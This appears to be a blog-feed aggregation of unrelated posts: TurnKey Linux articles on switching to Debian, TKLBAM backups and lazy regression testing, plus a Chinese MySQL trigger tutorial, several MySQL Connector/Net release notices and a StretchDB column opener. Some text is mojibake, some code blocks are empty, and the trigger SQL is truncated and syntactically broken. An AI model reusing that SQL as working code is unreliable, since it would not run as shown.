  1. Ubuntu supports less than 25% of available packages with security updates

    Remember that TurnKey is configured to auto-install security updates on a daily basis.

    This may sound dangerous to users coming from other operating systems but in practice works greats, because security updates in the Debian world are carefully back-ported to the current package version so that nothing changes besides the security fix.

    Unfortunately, if you're using Ubuntu there's a snag because Ubuntu only officially supports packages in its "main" repository section with security updates. Less than 25% of packages are included in the "main" repository section. The rest go into the unsupported "universe" and "multiverse".

    So if an Ubuntu based TurnKey appliance needs to use any of the nearly 30,000 packages that Ubuntu doesn't officially support, those packages don't get updates when security issues are revealed. That means users may get exposed to significantly more risk than with an equivalent Debian based TurnKey appliance.

    While Ubuntu are continually adding packages to its main repository, they can't keep pace with the rate of packages being added to Debian by thousands of Debian Developers. In fact, with each release the gap is growing ever wider so that an increasingly smaller percentage of packages are getting into main. For example, between Debian 6.0 (Squeeze) and the upcoming Debian 7.0 (Wheezy) release 8000 packages were added. In a comparable amount of time, between Ubuntu 10.04 (Lucid) and Ubuntu 12.04 only 1300 packages were added to main.

  2. Debian releases are much more bug-free and stable

    Stability wise, there's no comparison. Even the Ubuntu Long Term Support releases that come out every two years have serious bugs that would have held up a Debian release.

    Fundamentally this is due to the differences in priorities that drive the release process.

    Debian prioritizes technical correctness and stability. Releases are rock solid because they only happen when all of the release critical issues have been weeded out.

    By contrast, Ubuntu prioritizes the latest and greatest on a fixed schedule. It's forked off periodically from the Debian unstable version, also known as "sid" - the toy story kid that will break your toys. It then gets released on a fixed pre-determined date.

    There's no magic involved that makes Ubuntu suddenly bug-free by its intended release date compared with the version of Debian it was forked from. Ubuntu has a relatively small development team compared with Debian's thousands of developers. I think they're doing an amazing job with what they have but they can't perform miracles. That's not how software development works.

    So Debian is "done" when its done. Ubuntu is "done" when the clock runs out.

  3. Ubuntu's commercial support is not available for TurnKey anyhow

    Part of the original rational for building TurnKey on Ubuntu was Canonical's commercial support services. We theorized many higher-end business type users wouldn't be allowed to use a solution that didn't have strong commercial support backing.

    But 4 years passed, and despite talks with many very nice high level people at Canonical, nothing happened on the ground, except that one time Alon was invited to participate in an Ubuntu Developer Summit.

    We realized if we wanted to offer commercial support for TurnKey we'd have to offer it ourselves and in that case it would be easier to support Debian based solutions than Ubuntu.

Those were the main reasons for switching to Debian. Most of the people we talked to who cared about the issue one way or another preferred Debian for the same reasons, as did the majority of the 3000 people who participated in our website survey.

Don't get me wrong. Despite all the mud that has been slung at Ubuntu recently we still have a huge amount of respect for Ubuntu and even greater respect for the Ubuntu community. Sure, mistakes have been made, we're all only human after all, but let's not forget how much Ubuntu has done for the open source community.

Also, just because we don't have the resources to support Ubuntu versions of all TurnKey appliances right now doesn't mean we've ruled that out for the future. It's all about using the right tool for the job. If for some use cases (e.g., the desktop) that turns out to be Ubuntu, we'll use Ubuntu.

How to upgrade existing appliances to TurnKey 12

Simple: Just use TKLBAM to create a backup of an existing older version and then restore it on TurnKey 12.

TKLBAM only backs up files that have changed since the default installation. That means if you changed a configuration file on TurnKey 11.3 that configuration file will be backed up and re-applied when you restore to TurnKey 12.

What's next: opening up TurnKey, more developers = more appliances

To those inevitable number of you who will be disappointed that a favorite application hasn't made it into this release, please be patient, we're working within very tight resource constraints. I'll admit it's our own damn fault. We realized about a couple of years too late we haven't been open enough in the way we've been developing TurnKey.

Better late than never though. We're working very hard to fix this. Much of the work we've been doing over the last year has been to clean up and upgrade our development infrastructure so we can open it up fully to the community (and support additional architectures such as amd64!).

Soon anyone will be able to build TurnKey appliances from scratch using the same tools the core development team is using. We're working on this because it's the right thing to do as an open source project. We're also hoping it will help more people from the open source community contribute to TurnKey as equal members and lift the labor bottleneck that is preventing us from scaling from 100+ to a 1000+  TurnKey appliances.

Many, many thanks to...

  • Jeremy Davis, Adrian Moya, Basil Kurian, Rik Goldman (and his students), L.Arnold, John Carver, and Chris Musty. These guys submitted many TKLPatches that made it into this release, and even more importantly kept the community alive while we dropped off the face off the earth to focus on development.

    Their dedication and generosity have been an inspiration. We'd like the community to get to know them better so we'll soon be publishing interviews with them on the blog. Stay tuned.

  • Jeremy Davis AKA "The JedMeister": TurnKey forum moderator and all around super great guy. Jeremy is such an important part of what makes the TurnKey community tick I figured I should thank him at least twice. For emphasis. :)

  • The many rivers of upstream: Debian, Ubuntu and all of the wonderful open source communities who give love and write code for the software that goes into TurnKey.

  • Everyone else who helped test the 12.0 release candidate and provided ideas and feedback.

  • TurnKey users everywhere. Without you, TurnKey's audience, there really wouldn't be a point.

          New Hub feature: Auto-Restore TKLBAM backup to a new cloud server        

Since we announced the release of TurnKey Hub v1.0 two weeks ago, we followed up with the two top issues users reported, and continued to receive awesome feedback - you guys rock, keep it coming!

A common question we received was related to restoring a backup to a new server. This wasn't a new question either, last year Phil Bower said: "I only want to run my instances while I'm using them so I'm interested in figuring out the fastest way to create new instances and restore backups to them."

In light of this, we just released a new Hub feature that streamlines the restore process depending on your use case. It also makes testing your backups even easier!

Restore this backup to a new cloud server

Alice is a consultant developing a new site for her client on Turnkey Wordpress in a local virtual machine. She is regularly backing up her work with TKLBAM and has reached version 1.0 status - time for production.

Alice logs into her Hub account, goes to the backup dashboard and clicks "Restore this backup to a new cloud server". The Hub knows which appliance is related to her backup and launches a Wordpress instance. TKLBAM is automatically initialized and her backup is restored, essentially migrating her local VM to the cloud.

Restore on Launch 1

Alice jumps up and down with excitement. She immediately calls up her client to give them the great news. Development to production in 3 minutes flat!

Launch a new server like this one

Bob (aka Evil Bob) has a highly customized TurnKey LAMP instance running in the cloud. He has added user accounts, installed packages, saved data on the filesystem as well as MySQL. Additionally, he configured an EBS volume and Elastic IP when he launched the instance. He even customized the firewall rules.

Bob only needs the instance to be up about for a few days every week while crunching data for his evil plan, but launching a new instance, attaching the EBS, associating the EIP, tweaking the firewall rules and manually restoring his TKLBAM backup is a little tedious.

Tedious? Not any more! Once a week Bob logs into his Hub account, goes to the server dashboard and clicks "Launch a new server like this one".  He clicks the checkbox to automatically restore his backup, and he's off! The Hub launches a new server, automatically attaches his EBS volume (EBSMount mounts it), associates his Elastic IP, configures his custom firewall rules and restores his backup. 

Restore on launch 2

The lights dimm, Evil Bob's face lights up, raises his chin and lets out an evil laugh - MUHAHA!!

Note: The new restore features are not available for passphrase protected backups or legacy builds.

          A lazy yet surprisingly effective approach to regression testing        

To regression test, or not to regression test

Building up a proper testing suite can involve a good amount of work, which I'd prefer to avoid because it's boring and I'm lazy.

On the other hand, if I'm not careful, taking shortcuts that save effort in the short run could lead to a massive productivity hit further down the road.

For example, let's say instead of building up a rigorous test suite I test my code manually, and give a lot of careful thought to its correctness.

Right now I think I'm OK. But how long will it stay that way?

Often my code expresses a significant amount of subtle complexity and it would be easy to break the code in the future when the subtleties of the logic are not as fresh in my mind.

That could introduce regressions, nasty regressions, especially nasty if this code goes into production and breaks things for thousands of users. That would be a very public humiliation, which I would like to avoid.

So in the absence of a proper regression test, the most likely outcome is that if I ever need to make changes to the code I will get paralyzed by fear. And that, at the very least, will increase the cost of code maintenance considerably.

So maybe a regression test would be a good idea after all.

Comparing outputs: minimum work, maximum result

With that settled, the only part left to figure out is how to do it in the laziest possible way that still works.

For TKLBAM I implemented a lazy yet effective approach to regression testing which should work elsewhere as well.

In a nutshell the idea is to setup a bit of code (e.g., a shell script) that can run in two modes:

  1. create reference: this saves the output from code that is assumed to work well. These outputs should be revision controlled, just like the code that generates them.

    For example, in tklbam if you pass regtest.sh the --createrefs cli option it runs various internal commands on pre-determined inputs and saves their output to reference files.

  2. compare against reference: this runs the same code on the same inputs and compares the output with previously saved output.

    For example, in tklbam when you run regtest.sh without any options it repeats all the internal command tests on the same pre-determined inputs and compares the output to the previously saved reference output.

Example from TKLBAM's shell script regtest:

internal dirindex --create index testdir
testresult ./index "index creation"

Testresult is just a shell script function with a bit of magic that detects which mode we're running in (e.g., based on an environment variable because this is a lowly shell script).

Example usage of regtest.sh:

$ regtest.sh --createrefs
$ regtest.sh
OK: 1 - dirindex creation
OK: 2 - dirindex creation with limitation
OK: 3 - dirindex comparison
OK: 4 - fixstat simulation
OK: 5 - fixstat simulation with limitation
OK: 6 - fixstat simulation with exclusion
OK: 7 - fixstat with uid and gid mapping
OK: 8 - fixstat repeated - nothing to do
OK: 9 - dirindex comparison with limitation
OK: 10 - dirindex comparison with inverted limitation
OK: 11 - delete simulation
OK: 12 - delete simulation with limitation
OK: 13 - delete
OK: 14 - delete repeated - nothing to do
OK: 15 - merge-userdb passwd
OK: 16 - merge-userdb group
OK: 17 - merge-userdb output maps
OK: 18 - newpkgs
OK: 19 - newpkgs-install simulation
OK: 20 - mysql2fs verbose output
OK: 21 - mysql2fs myfs.tar md5sum
OK: 22 - fs2mysql verbose output
OK: 23 - fs2mysql tofile=sql

I'm using this to test cli-level outputs but you could use the same basic approach for code-level components (e.g., classes, functions, etc.) as well.

Note that one gotcha is that you have to clean the outputs you're comparing from local noise (e.g., timestamps, current working directory). For example the testresult function I'm using for tklbam runs the output through sed and sort so that it doesn't include the local path.

Instead of:

/home/liraz/public/tklbam/tests/testdir 41ed    0       0
/home/liraz/public/tklbam/tests/testdir/chgrp   81a4    0 e1f06
/home/liraz/public/tklbam/tests/testdir/chmod   81a4    0 d58c9
/home/liraz/public/tklbam/tests/testdir/chown   81a4    0 d58cc
/home/liraz/public/tklbam/tests/testdir/donttouchme     81a4 0 4b8d58ab
/home/liraz/public/tklbam/tests/testdir/emptydir        41ed 0 4b8d361c
/home/liraz/public/tklbam/tests/testdir/file    81a4    0 d35bd
/home/liraz/public/tklbam/tests/testdir/link    a1ff    0 d362e

We get:

testdir 41ed    0       0
testdir/chgrp   81a4    0 e1f06
testdir/chmod   81a4    0 d58c9
testdir/chown   81a4    0 d58cc
testdir/donttouchme     81a4 0    4b8d58ab
testdir/emptydir        41ed 0    4b8d361c
testdir/file    81a4    0 d35bd
testdir/link    a1ff    0 d362e

That way the tests don't break if we happen to run them from another directory.

          TKLBAM: a new kind of smart backup/restore system that just works        

Drum roll please...

Today, I'm proud to officially unveil TKLBAM (AKA TurnKey Linux Backup and Migration): the easiest, most powerful system-level backup anyone has ever seen. Skeptical? I would be too. But if you read all the way through you'll see I'm not exaggerating and I have the screencast to prove it. Aha!

This was the missing piece of the puzzle that has been holding up the Ubuntu Lucid based release batch. You'll soon understand why and hopefully agree it was worth the wait.

We set out to design the ideal backup system

Imagine the ideal backup system. That's what we did.

Pain free

A fully automated backup and restore system with no pain. That you wouldn't need to configure. That just magically knows what to backup and, just as importantly, what NOT to backup, to create super efficient, encrypted backups of changes to files, databases, package management state, even users and groups.

Migrate anywhere

An automated backup/restore system so powerful it would double as a migration mechanism to move or copy fully working systems anywhere in minutes instead of hours or days of error prone, frustrating manual labor.

It would be so easy you would, shockingly enough, actually test your backups. No more excuses. As frequently as you know you should be, avoiding unpleasant surprises at the worst possible timing.

One turn-key tool, simple and generic enough that you could just as easily use it to migrate a system:

  • from Ubuntu Hardy to Ubuntu Lucid (get it now?)
  • from a local deployment, to a cloud server
  • from a cloud server to any VPS
  • from a virtual machine to bare metal
  • from Ubuntu to Debian
  • from 32-bit to 64-bit

System smart

Of course, you can't do that with a conventional backup. It's too dumb. You need a vertically integrated backup that has system level awareness. That knows, for example, which configuration files you changed and which you didn't touch since installation. That can leverage the package management system to get appropriate versions of system binaries from package repositories instead of wasting backup space.

This backup tool would be smart enough to protect you from all the small paper-cuts that conspire to make restoring an ad-hoc backup such a nightmare. It would transparently handle technical stuff you'd rather not think about like fixing ownership and permission issues in the restored filesystem after merging users and groups from the backed up system.

Ninja secure, dummy proof

It would be a tool you could trust to always encrypt your data. But it would still allow you to choose how much convenience you're willing to trade off for security.

If data stealing ninjas keep you up at night, you could enable strong cryptographic passphrase protection for your encryption key that includes special countermeasures against dictionary attacks. But since your backup's worst enemy is probably staring you in the mirror, it would need to allow you to create an escrow key to store in a safe place in case you ever forget your super-duper passphrase.

On the other hand, nobody wants excessive security measures forced down their throats when they don't need them and in that case, the ideal tool would be designed to optimize for convenience. Your data would still be encrypted, but the key management stuff would happen transparently.

Ultra data durability

By default, your AES encrypted backup volumes would be uploaded to inexpensive, ultra-durable cloud storage designed to provide %99.999999999 durability. To put 11 nines of reliability in perspective, if you stored 10,000 backup volumes you could expect to lose a single volume once every 10 million years.

For maximum network performance, you would be routed automatically to the cloud storage datacenter closest to you.

Open source goodness

Naturally, the ideal backup system would be open source. You don't have to care about free software ideology to appreciate the advantages. As far as I'm concerned any code running on my servers doing something as critical as encrypted backups should be available for peer review and modification. No proprietary secret sauce. No pacts with a cloudy devil that expects you to give away your freedom, nay worse, your data, in exchange for a little bit of vendor-lock-in-flavored convenience.

Tall order huh?

All of this and more is what we set out to accomplish with TKLBAM. But this is not our wild eyed vision for a future backup system. We took our ideal and we made it work. In fact, we've been experimenting with increasingly sophisticated prototypes for a few months now, privately eating our own dog food, working out the kinks. This stuff is complex so there may be a few rough spots left, but the foundation should be stable by now.

Seeing is believing: a simple usage example

We have two installations of TurnKey Drupal6:

  1. Alpha, a virtual machine on my local laptop. I've been using it to develop the TurnKey Linux web site.
  2. Beta, an EC2 instance I just launched from the TurnKey Hub.

In the new TurnKey Linux 11.0 appliances, TKLBAM comes pre-installed. With older versions you'll need to install it first:

apt-get update
apt-get install tklbam webmin-tklbam

You'll also need to link TKLBAM to your TurnKey Hub account by providing the API-KEY. You can do that via the new Webmin module, or on the command line:

tklbam-init QPINK3GD7HHT3A

I now log into Alpha's command line as root (e.g., via the console, SSH or web shell) and do the following:


It's that simple. Unless you want to change defaults, no arguments or additional configuration required.

When the backup is done a new backup record will show up in my Hub account:

To restore I log into Beta and do this:

tklbam-restore 1

That's it! To see it in action watch the video below or better yet log into your TurnKey Hub account and try it for yourself.

Quick screencast (2 minutes)

Best viewed full-screen. Having problems with playback? Try the YouTube version.

The screencast shows TKLBAM command line usage, but users who dislike the command line can now do everything from the comfort of their web browser, thanks to the new Webmin module.

Getting started

TKLBAM's front-end interface is provided by the TurnKey Hub, an Amazon-powered cloud backup and server deployment web service currently in private beta.

If you don't have a Hub account already, request an invitation. We'll do our best to grant them as fast as we can scale capacity on a first come, first served basis. Update: currently we're doing ok in terms of capacity so we're granting invitation requests within the hour.

To get started log into your Hub account and follow the basic usage instructions. For more detail, see the documentation.

Feel free to ask any questions in the comments below. But you'll probably want to check with the FAQ first to see if they've already been answered.

Upcoming features

  • PostgreSQL support: PostgreSQL support is in development but currently only MySQL is supported. That means TKLBAM doesn't yet work on the three PostgreSQL based TurnKey appliances (PostgreSQL, LAPP, and OpenBravo).
  • Built-in integration: TKLBAM will be included by default in all future versions of TurnKey appliances. In the future when you launch a cloud server from the Hub it will be ready for action immediately. No installation or initialization necessary.
  • Webmin integration: we realize not everyone is comfortable with the command line, so we're going to look into developing a custom webmin module for TKLBAM. Update: we've added the new TKLBAM webmin module to the 11.0 RC images based on Lucid. In older images, the webmin-tklbam package can also be installed via the package manager.

Special salute to the TurnKey community

First, many thanks to the brave souls who tested TKLBAM and provided feedback even before we officially announced it. Remember, with enough eyeballs all bugs are shallow, so if you come across anything else, don't rely on someone else to report it. Speak up!

Also, as usual during a development cycle we haven't been able to spend as much time on the community forums as we'd like. Many thanks to everyone who helped keep the community alive and kicking in our relative absence.

Remember, if the TurnKey community has helped you, try to pay it forward when you can by helping others.

Finally, I'd like to give extra special thanks to three key individuals that have gone above and beyond in their contributions to the community.

By alphabetical order:

  • Adrian Moya: for developing appliances that rival some of our best work.
  • Basil Kurian: for storming through appliance development at a rate I can barely keep up with.
  • JedMeister: for continuing to lead as our most helpful and tireless community member for nearly a year and a half now. This guy is a frigging one man support army.

Also special thanks to Bob Marley, the legend who's been inspiring us as of late to keep jamming till the sun was shining. :)

Final thoughts

TKLBAM is a major milestone for TurnKey. We're very excited to finally unveil it to the world. It's actually been a not-so-secret part of our vision from the start. A chance to show how TurnKey can innovate beyond just bundling off the shelf components.

With TKLBAM out of the way we can now focus on pushing out the next release batch of Lucid based appliances. Thanks to the amazing work done by our star TKLPatch developers, we'll be able to significantly expand our library so by the next release we'll be showcasing even more of the world's best open source software. Stir It Up!

发表于668 天前 ⁄ IT技术 ⁄ æš‚无评论



定义: 何为MySQL触发器?

在MySQL Server里面也就是对某一个表的一定的操作,触发某种条件(Insert,Update,Delete 等),从而自动执行的一段程序。从这种意义上讲触发器是一个特殊的存储过程。下面通过MySQL触发器实例,来了解一下触发器的工作过程吧!



    /*Table structure for table `t_a` */
    CREATE TABLE `t_a` (
      `id` smallint(1) unsigned NOT NULL AUTO_INCREMENT,
      `username` varchar(20) DEFAULT NULL,
      `groupid` mediumint(8) unsigned NOT NULL DEFAULT '0',
      PRIMARY KEY (`id`)
    /*Data for the table `t_a` */
    /*Table structure for table `t_b` */
    CREATE TABLE `t_b` (
      `id` smallint(1) unsigned NOT NULL AUTO_INCREMENT,
      `username` varchar(20) DEFAULT NULL,
      `groupid` mediumint(8) unsigned NOT NULL DEFAULT '0',
      PRIMARY KEY (`id`)
    /*Data for the table `t_b` */





    USE `test`$$
    DROP TRIGGER /*!50032 IF EXISTS */ `tr_a_insert`$$
        /*!50017 DEFINER = 'root'@'localhost' */
        TRIGGER `tr_a_insert` AFTER INSERT ON `t_a`
            INSERT INTO `t_b` SET username = NEW.username, groupid=NEW.groupid;

    USE `test`$$
    DROP TRIGGER /*!50032 IF EXISTS */ `tr_a_update`$$
        /*!50017 DEFINER = 'root'@'localhost' */
        TRIGGER `tr_a_update` AFTER UPDATE ON `t_a`
          IF new.groupid != old.groupid OR old.username != new.username THEN
            UPDATE `t_b` SET groupid=NEW.groupid,username=NEW.username WHEREusername=OLD.username AND groupid=OLD.groupid;
          END IF;

    USE `test`$$
    DROP TRIGGER /*!50032 IF EXISTS */ `tr_a_delete`$$
        /*!50017 DEFINER = 'root'@'localhost' */
        TRIGGER `tr_a_delete` AFTER DELETE ON `t_a`
            DELETE FROM `t_b` WHERE username=Old.username AND groupid=OLD.groupid;






        INSERT INTO `t_a` (username,groupid) VALUES ('sky54.net',123)
        SELECT id,username,groupid FROM `t_a`
        SELECT id,username,groupid FROM `t_b`



世界上任何一种事物都其其优点和缺点,优点与缺点是自身一个相对立的面。当然这里不是强调“世界非黑即白”式的“二元论”,“存在即合理”嘛。当然 MySQL触发器的优点不说了,说一下不足之处,MySQL Trigger没有很好的调试、管理环境,难于在各种系统环境下测试,测试比MySQL存储过程要难,所以建议在生成环境下,尽量用存储过程来代替 MySQL触发器。



abin 2016-08-18 17:25 发表评论








1. “weight”值为正数时




2. “weight”值为负数时






abin 2015-10-12 00:50 发表评论

          How to Install TaskBoard on CentOS 7        
TaskBoard is a free and open source application to keep a track of the tasks that needs to be done. It requires minimal dependencies to work. Database is stored in SQLite which eliminates the requirement of MySQL or any other database server.
          How to Install MySQL Server with phpMyAdmin on FreeBSD 11        
In this tutorial, we will install MySQL with phpMyAdmin along with Apache web server with PHP 5.6. MySQL is a free and open source relational management system. It stores data in tabular format. It is the most popular way of storing the data into the database. phpMyAdmin is also a free and open source application used to administrate a MySQL server instance through a rich graphical user interface.
          MySQL Connector/Net 6.4.4 has been released        
MySQL Connector/Net 6.4.4, a new version of the all-managed .NET driver for MySQL has been released.  This is an update to our latest GA release and is intended for full production deployment.

Version 6.4.4 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from here and mirror sites (note that not all mirror sites may be up to date at this point of time- if you can't find this version on some mirror, please try again later or choose another download site.)

The release is also available for download on the My Oracle Support (MOS) and will be available from Oracle eDelivery.

This release includes several bug fixes including a fix to using Windows authentication.  Please review the change log and documentation for a review of what changed.

Enjoy and thanks for the support!
          Forum for MySQL Instaler        
A few days ago we announced the availability of our new MySQL Installer for Windows.  While it's a great first edition we know that you are going to have questions and we wanted the community to be able to help.  So we have created a new forum for the community to be able to discuss questions and issues with the new installer.

You can access the new forum here.

So, go forth and post!
          Welcome to the world, MySQL Installer for Windows!        
Well, our baby is born!  Some time ago we analyzed the feedback from users and customers and determined that far too many of our server installs were failing.  We have the best open-source database on the planet but no one can see that if we can't get it properly installed.  Clearly something had to be done.

So, the new MySQL Installer is born.  It's a Windows application that comes delivered in a bundle along with a version of the database server, applications like Workbench, connectors, samples, and documentation.  It includes some customized configuration screens that help with setting up the proper configuration files.

One of the great benefits of using the new MySQL Installer is that it comes with all the products very tightly integrated such as automatically creating connection entries in Workbench for the freshly installed server.  Our goal with MySQL is to have you up and running in 15 minutes.  With the new MySQL Installer, we've got that down to 3 minutes!

The best way to see all the greatness that is MySQL Installer is to download it yourself.  You can grab a copy here.

You can also see the Oracle press release on it here.

Thank you for trying out our new MySQL Installer and please let us know what you think!
          MySQL Connector/Net 6.4.3 GA has been released        
MySQL Connector/Net 6.4.3, a new version of the all-managed .NET driver for MySQL has been released.  This is a GA release and is intended for full production deployment.

Version 6.4.3 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from [http://dev.mysql.com/downloads/connector/net/6.4.html] and mirror
sites (note that not all mirror sites may be up to date at this point of time
- if you can't find this version on some mirror, please try again later or choose another download site.)
The release is also available for download on the My Oracle Support (MOS) and will be available from Oracle eDelivery.

** New features found in 6.4 include (please see release notes for more information) **

* Windows Authentication*
This release includes our new support for Windows authentication when connecting to MySQL Server 5.5.

* Table Caching *
We are also introducing a new feature called table caching.  This feature makes it possible to cache the rows of slow changing tables on the client side.

* Simple connection fail-over support *

We are also including some SQL generation improvements related to our entity framework provider.   Please review the change log that ships with the product for a complete list of changes and enhancements.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.2.5 GA has been released (legacy)        
MySQL Connector/Net 6.2.5, a update to our all-managed .NET driver for MySQL has been released.  This is an update to our legacy 6.2 version line. All new development should be using a more recent product such as 6.4.3.

Version 6.2.5 is intended for use with versions of MySQL from 4.1 - 5.1.  It is not suitable for use with MySQL 5.5 or later.

It is now available in source and binary form from [http://dev.mysql.com/downloads/connector/net/] and mirror
sites (note that not all mirror sites may be up to date at this point of time
- if you can't find this version on some mirror, please try again later or choose another download site.)

This update includes more than 45 fixes from 6.2.4.  Please review the change log that is included with the product to determine the exact nature of the changes.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.1.6 (legacy update) has been released        
MySQL Connector/Net 6.1.6, a update to our all-managed .NET driver for MySQL has been released.  This is an update to our legacy 6.1 version line. All new development should be using a more recent product such as 6.3.7. 

Version 6.1.6 is intended for use with versions of MySQL from 4.1 - 5.1.  It is not suitable for use with MySQL 5.5 or later.

It is now available in source and binary form from here and mirror sites (note that not all mirror sites may be up to date at this point of time
- if you can't find this version on some mirror, please try again later or choose another download site.)

This update includes more than 35 fixes from 6.1.5.  Please review the change log that is included with the product to determine the exact nature of the changes.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.4.2 RC has been released        
MySQL Connector/Net 6.4.2, a new version of the all-managed .NET driver for MySQL has been released.  This is a Release Candidate and is intended for testing and exposure to new features.  We strongly urge you to not use this release in a production environment.

Version 6.4.2 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from here and mirror sites (note that not all mirror sites may be up to date at this point of time
- if you can't find this version on some mirror, please try again later or choose another download site.) 

New features found in 6.4 include (please see release notes for more information)

  • Windows Authentication -- This release includes our new support for Windows authentication when connecting to MySQL Server 5.5. 

  • Table Caching -- We are also introducing a new feature called table caching.  This feature makes it possible to cache the rows of slow changing tables on the client side. 

  • Simple connection fail-over support -- We are also including some SQL generation improvements related to our entity framework provider.  

Please review the change log that ships with the product for a complete list of changes and enhancements.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.3.7 has been released        
MySQL Connector/Net 6.3.7, a new version of the all-managed .NET driver for MySQL has been released. This is a maintenance release to our existing 6.3 products and is suitable for use in production environments against MySQL server 5.0-5.5.

It is now available in source and binary form from [http://dev.mysql.com/downloads/connector/net/6.3.html] and mirror sites (note that not all mirror sites may be up to date at this point of time

- if you can't find this version on some mirror, please try again later or choose another download site.)

Please review the change log for details on what is fixed or changed in this release.
          MySQL Connector/Net 6.4.1 beta has been released        
MySQL Connector/Net 6.4.1, a new version of the all-managed .NET driver for MySQL has been released.  This release is of Beta quality and is intended for testing and exposure to new features.  We strongly urge you to not use this release in a production environment.

Version 6.4.1 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from [http://dev.mysql.com/downloads/connector/net/6.4.html] and mirror
sites (note that not all mirror sites may be up to date at this point of time
- if you can't find this version on some mirror, please try again later or choose another download site.)

** New features found in 6.4 include (please see release notes for more information) **

* Windows Authentication*
This release includes our new support for Windows authentication when connecting to MySQL Server 5.5.

* Table Caching *
We are also introducing a new feature called table caching.  This feature makes it possible to cache the rows of slow changing tables on the client side.

* Simple connection fail-over support *

We are also including some SQL generation improvements related to our entity framework provider.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.4.0 Alpha has been released        
MySQL Connector/Net 6.4.0, a new version of the all-managed .NET driver for MySQL has been released. This release is of Alpha quality and is intended for testing and exposure to new features. We strongly urge you to not use this release in a production environment.

Version 6.4.0 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from here and mirror
sites (note that not all mirror sites may be up to date at this point of time
- if you can't find this version on some mirror, please try again later or choose another download site.)

New features in this release (please see release notes for more information)

Windows Authentication
This release includes our new support for Windows authentication when connecting to MySQL Server 5.5.

Table Caching
We are also introducing a new feature called table caching. This feature makes it possible to cache the rows of slow changing tables on the client side.

We are also including some SQL generation improvements related to our entity framework provider.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.3.5 maintenance released        

We're happy to announce the latest maintenance release of MySQL Connector/Net 6.3.5.

Version 6.3.5 maintenance release includes:

  • Fixes to some installer bugs related to .NET Framework 4.0

  • Fixes for several other bugs

For details see http://dev.mysql.com/doc/refman/5.1/en/connector-net-news-6-3-5.html

MySQL Connector 6.3.5 :

  1. Provides secure, high-performance data connectivity with MySQL.

  2. Implements ADO.NET interfaces that integrate into ADO.NET aware tools.

  3. Is a fully managed ADO.NET driver written in 100% pure C#.

  4. Provide Visual Studio Integration

If you are a current user, we look forward to your feedback on all the new capabilities we are delivering.

As always, you will find binaries and source on our download pages.

Please get your copy from http://dev.mysql.com/downloads/connector/net/6.3.html.

To get started quickly, please take a look at our short tutorials.

MySQL Connector/NET Tutorials

Blog postings and general information can be found on our Developer Zone site.

MySQL Developer Zone

.NET Forum


Connecotor/NET Documentation and details on changes between releases can be found on these pages

If you need any additional info or help please get in touch with us by posting in our forums or leaving comments on our blog pages.

          MySQL Connector/Net 6.3.4 GA has been released        
We're proud to announce the next release of MySQL Connector/Net version 6.3.4.  This release is GA (Generally Available).

We hope you will make MySQL Connector/Net your preferred set of .NET components including our ADO.Net library and other Microsoft .NET frameworks components such as our Visual Studio plugin and Entity Framework for MySQL.

We are dedicated to providing the best tools for your MySQL database .NET applications.

Special thanks go to all the great MySQL beta testers that provided valuable ideas, insights, and bug reports to the Connector/Net team.  Your beta feedback truly helped us improve the product.

Version 6.3.4 provides the following new features:
- The ability to dynamically enable/disable query analysis at runtime.
- Visual Studio 2010 compatibility
- Improved compatibility with Visual Studio wizards using our new SQL Server mode
- Support for Model-First development using Entity Framework
- Nested transaction scopes
- Other improvements and bug fixes!
For details see

If you are a current user, we look forward to your feedback on all the new capabilities we are delivering.  As always, you will find binaries and source on our download pages.

Please get your copy from http://dev.mysql.com/downloads/connector/net/6.3.html

To get started quickly, please take a look at our short tutorials.

MySQL Connector/NET Tutorials

Blog postings and general information can be found on our Developer Zone site.

MySQL Developer Zone

.NET Forum


Connector/NET Documentation and details on changes between releases can be found on these pages

If you need any additional info or help please get in touch with us.  Post in our forums or leave comments on our blog pages.
          Kommentar zu Why favor PostgreSQL over MariaDB / MySQL von pzzcc        
thank you for pointing out the real differences , what brought me here was postgis. I would be really interested in reading a blog post written by you covering those differences and their practical usages ( like postgis example you put above.)
          Markus Wolff at Thu, 09 Nov 2006 17:19:41 +0100        
I attended the MySQLUG-Hamburg meeting this Monday, where we had a session about Rails' ActiveRecord package. After the session, we got to talk a bit and comparing Rails (the framework) against PHP (the language) seemed to be a quite common theme. Apples and Oranges, I say. If I had to write a web application from scratch in plain Ruby without a framework whatsoever, I'd have little to no advantage over PHP in terms of development speed. In fact, I'd even say because PHP is optimized for web apps and Ruby is more like general-purpose, PHP would win hands down. So all these comparisons you find all over the web really say nothing at all. It becomes a lot more interesting when you start comparing actual frameworks in different languages. Let's say, Ruby vs. Symfony vs. Struts vs. ASP.NET? But wait, that would make no sense as well: You would need to compare only frameworks that follow the same design approach. Rails is classic MVC, so it wouldn't make any sense to make a direct comparison between Rails and ASP.NET, as the latter is an event-based component framework. ASP.NET could, for example, be compared to PHP's PRADO. But where to draw the line? Well, no matter what comparisons actually would make sense - comparing frameworks to languages definitely doesn't :-)
          What kind of server does this site operate on?        
Our site is hosted on a Virtual Private Server, which has been provided by Stable Host (Enter promotional code "VNC" for discounts at checkout). Our current server specifications are (last updated: May 2016): Memory: 4GB CPU: Quad Core 2GHz OS: CentOS 6.7 Webserver: Apache 2.2, PHP 5.6, MySQL 5.1 Our server is managed by VNC Web Services.
          MySQL. Расширяем функционал работы со списками.        
MySQL работает, в основном, со списками формата CSV. Штатный набор функций весьма слаб. В данной статье рассказывается о списках, возможностях встроенных функций и расширении набора за счет пользовательских процедур.
          DBTA - StretchDB, a Cool New Feature in vNext SQL Server        

Originally appearing in my monthly column at Database Trends & Applications magazine. 

When it comes to cloud-based database management, there are really only two players: Amazon, the value leader, and Microsoft, the innovation leader. Amazon has carved out a niche as the value leader in cloud-based database management, supporting not only its own implementations of various database platforms such as MySQL and Hadoop, but also supporting premier commercial DBMSs such as Microsoft SQL Server and Oracle. Meanwhile, Microsoft has, in my mind, carved out a very strong niche as the innovation leader by offering powerful technologies to integrate on-premises databases with various Azure services.


